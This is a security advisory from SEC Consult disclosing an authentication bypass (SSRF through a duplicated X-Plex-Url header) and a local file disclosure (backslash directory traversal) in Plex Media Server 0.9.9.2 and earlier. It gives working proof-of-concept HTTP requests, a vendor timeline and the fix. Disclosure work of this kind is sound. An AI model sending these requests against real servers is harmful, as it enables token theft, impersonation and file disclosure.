Plex Media Server 0.9.9.2.374-aa23a69 Bypass / File Disclosure

`SEC Consult Vulnerability Lab Security Advisory < 20140228-1 >  
=======================================================================  
title: Authentication bypass (SSRF) and local file disclosure   
product: Plex Media Server  
vulnerable version: <=0.9.9.2.374-aa23a69  
fixed version: >=0.9.9.3  
impact: Critical  
homepage: http://www.plex.tv  
found: 2014-02-06  
by: Stefan Viehböck  
SEC Consult Vulnerability Lab  
https://www.sec-consult.com  
=======================================================================  
  
Vendor/product description:  
-----------------------------  
"Plex is a media player system consisting of a player application with a  
10-foot user interface and an associated media server. It is available for  
Mac OS X, Linux, and Microsoft Windows."  
  
URL: https://en.wikipedia.org/wiki/Plex_(software)  
  
  
Vulnerability overview/description:  
-----------------------------------  
1. Authentication bypass / Server Side Request Forgery (SSRF)  
The Plex Media Server "/system/proxy" functionality fails to properly validate  
pre-authentication user requests. This allows unauthenticated attackers to make  
the Plex Media Server execute arbitrary HTTP requests.  
  
By requesting content from 127.0.0.1 an attacker can bypass all authentication  
and execute commands with administrative privileges.  
  
2. Unauthenticated local file disclosure  
Because of insufficient input validation, arbitrary local files can be  
disclosed. Files that include passwords and other sensitive information can  
be accessed.  
  
  
Plex "Remote" servers (thousands of them can be found via Shodan and Google,  
none of them were accessed) are affected by both vulnerabilities as well.  
  
  
Proof of concept:  
-----------------  
1. Authentication bypass / Server Side Request Forgery (SSRF)  
The following GET request bypasses the webserver whitelist.   
  
GET /system/proxy HTTP/1.1  
Host: <PLEX_WAN_HOST>  
X-Plex-Url: http://localhost:32400/myplex/account?IRRELEVANT=  
X-Plex-Url: http://my.plexapp.com/  
  
  
The last X-Plex-Url header value "http://my.plexapp.com/" is contained in  
the whitelist (Regex) and passes validation. The request is then processed by  
the actual request handler in the backend webserver (Python). Here both header  
values are concatenated using a comma. This way the actual URL that is  
requested is controlled by the first X-Plex-Url value.  
By indicating a parameter (called IRRELEVANT) the second X-Plex-Url value is  
dissolved.  
  
This results in the following request (made by Plex Media Server):  
  
GET /myplex/account?IRRELEVANT=,http://my.plexapp.com/ HTTP/1.1  
Host: localhost:32400  
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2b4) Gecko/20091124 Firefox/3.6b4 (.NET CLR 3.5.30729)  
Connection: close  
Accept: */*  
Accept-Encoding: gzip  
  
  
The response for this request is passed to the attacker and includes the  
authToken value ("master token"), which can be used to impersonate legitimate  
Plex users. Of course other administrative actions can be performed as well.  
  
<?xml version="1.0" encoding="UTF-8"?>  
<MyPlex authToken="<REMOVED>" username="<REMOVED>" mappingState="mapped" mappingError="" mappingErrorMessage="1" signInState="ok" publicAddress="1" publicPort="9415" privateAddress="1" privatePort="32400" subscriptionFeatures="cloudsync,pass,sync" subscriptionActive="1" subscriptionState="Active">  
</MyPlex>  
  
  
A video demonstrating this issue has been released by SEC Consult:  
http://www.youtube.com/watch?v=f99fm4QU9u8  
  
  
2. Unauthenticated local file disclosure  
The following requests show different functionality that is vulnerable to  
directory traversal:  
  
GET /manage/..\..\..\..\..\..\..\..\..\..\secret.txt HTTP/1.1  
Host: <HOST>  
  
GET /web/..\..\..\..\..\..\..\..\..\..\secret.txt HTTP/1.1  
Host: <HOST>  
  
GET /:/resources/..\..\..\..\..\..\..\..\..\..\secret.txt HTTP/1.1  
Host: <HOST>  
  
The /manage/ and /web/ handlers can be exploited without prior authentication.  
This vulnerability was confirmed on Windows.  
  
  
  
Vulnerable / tested versions:  
-----------------------------  
The vulnerabilities have been verified to exist in Plex Media Server version  
0.9.9.2.374-aa23a69.  
  
  
Vendor contact timeline:  
------------------------  
2014-02-09: Contacting vendor through [email protected] and requesting  
encryption keys.  
2014-02-10: Vendor provides encryption keys.  
2014-02-10: Sending advisory and proof of concept exploit.  
2014-02-10: Vendor acknowledges receipt of advisory.  
2014-02-17: Requesting status update.  
2014-02-17: Vendor provides release timeline.  
2014-02-20: Vendor releases fixed version (0.9.9.3).  
2014-02-21: Requesting clarification regarding fixed version.  
2014-02-21: Vendors provides further information about fixed version and  
other reported vulnerabilities.  
2014-02-28: SEC Consult releases coordinated security advisory.  
  
  
Solution:  
---------  
Update to a more recent version of Plex Media Server (eg. 0.9.9.5).  
  
  
Workaround:  
-----------  
No workaround available.  
  
  
Advisory URL:  
-------------  
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
SEC Consult Vulnerability Lab  
  
SEC Consult  
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius  
  
Headquarter:  
Mooslackengasse 17, 1190 Vienna, Austria  
Phone: +43 1 8903043 0  
Fax: +43 1 8903043 15  
  
Mail: research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult  
  
Interested in working with the experts of SEC Consult?  
Write to [email protected]  
  
EOF Stefan Viehböck / @2014  
`